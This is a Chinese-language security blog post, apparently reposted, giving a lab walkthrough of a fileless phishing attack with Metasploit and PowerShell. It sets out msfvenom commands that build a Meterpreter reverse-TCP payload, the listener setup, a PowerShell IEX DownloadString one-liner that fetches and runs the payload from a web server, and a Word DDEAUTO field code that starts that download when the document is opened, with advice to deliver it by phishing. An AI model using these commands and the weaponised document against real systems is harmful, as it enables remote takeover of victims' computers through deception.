MSFaPowershell进行钓鱼攻击

admin 2022年1月9日06:27:49安全闲碎评论28 views1797字阅读5分59秒阅读模式

一、Powershell配合MSF无文件攻击


实验环境:

攻击机

kali

192.168.1.7

靶机

win 07

192.168.1.9

web服务器

win 10

192.168.1.6

本次实验的大致过程如下:

    MSF生成payload并放到靶机能够访问的服务器上,攻击者通过钓鱼等方式使靶机执行powershell代码,靶机反弹到msf监听的端口上建立会话,由此攻击者可以利用此会话完成攻击控制靶机。


实验步骤:

1. kali生成payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=1121 -f psh-reflection >x.ps1

# 生成名为x.ps1的windows/x64/meterpreter/reverse_tcp的payload


MSFaPowershell进行钓鱼攻击

2. msf 设置监听

msfconsoleuse exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 192.168.1.7set lport 1121run# msf开始监听本机1121端口


MSFaPowershell进行钓鱼攻击


将刚刚生成的payload放到公网服务器,确保靶机能够访问。

MSFaPowershell进行钓鱼攻击


在靶机直接运行powershell脚本,实战需要其他方式运行此代码:

powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.6/x.ps1')

# 代码中的地址为公网地址。通过word域代码执行powershell脚本调用web服务器poayload

下载到靶机内存中执行

MSFaPowershell进行钓鱼攻击

当靶机成功执行以上命令之后,msf会收到会话如下图,此时已经成功建立会话,可控制靶机。实验成功;

MSFaPowershell进行钓鱼攻击


二、Powershell配合word钓鱼


攻击机

kali

192.168.1.7

靶机

win 07

192.168.1.9

(安装有office2013)

web服务器

win 10

192.168.1.6

 原理:

新建word文档,调用快捷键:CTRL+F9,填写域代码:

{DDEAUTO C:\windows\system32\cmd.exe "/k notepad.exe}

  然后保存word,再次打开时会执行代码弹出记事本程序。word可以通过域代码执行系统命令。本实验利用word域调用powershell代码从而建立会话,控制靶机。


本次实验的大致过程如下: 

  将MSF生成payload并放到公网(模拟)web服务器上,确保靶机能够访问。对靶机进行word钓鱼攻击。当靶机打开word文件,会下载powershell payload到本地并执行,从而建立会话进行无文件攻击。


实验步骤:

  1. kali生成ps脚本:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=1122 -f psh-reflection >x.ps2

# 生成名为x.ps2的windows/x64/meterpreter/reverse_tcp的payload

MSFaPowershell进行钓鱼攻击

    2. msf 设置监听

msfconsoleuse exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 192.168.1.7set lport 1122run# msf开始监听本机1122端口

MSFaPowershell进行钓鱼攻击

    3.将生成的payload放到公网服务器,确保靶机能够访问。

MSFaPowershell进行钓鱼攻击

    4.在本地新建word文档设置域(快捷键:CTRL+F9),域内代码为:

DDEAUTO C:\windows\system32\cmd.exe "/k powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.6/x.ps2') "

    5.通过钓鱼等方式将该word文档发送到靶机诱使靶机点击文档。成功建立会话,可控制靶机。实验成功

MSFaPowershell进行钓鱼攻击

---》

强烈推荐:

    每日发布 红队攻防技术文章、蓝队防守技术文章、ctf安全赛事技术文章、安全运维基线文章、以及不定期的安全类书籍抽奖~

MSFaPowershell进行钓鱼攻击

本文始发于微信公众号(LemonSec):MSF&Powershell进行钓鱼攻击

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月9日06:27:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  MSFaPowershell进行钓鱼攻击 http://cn-sec.com/archives/473850.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: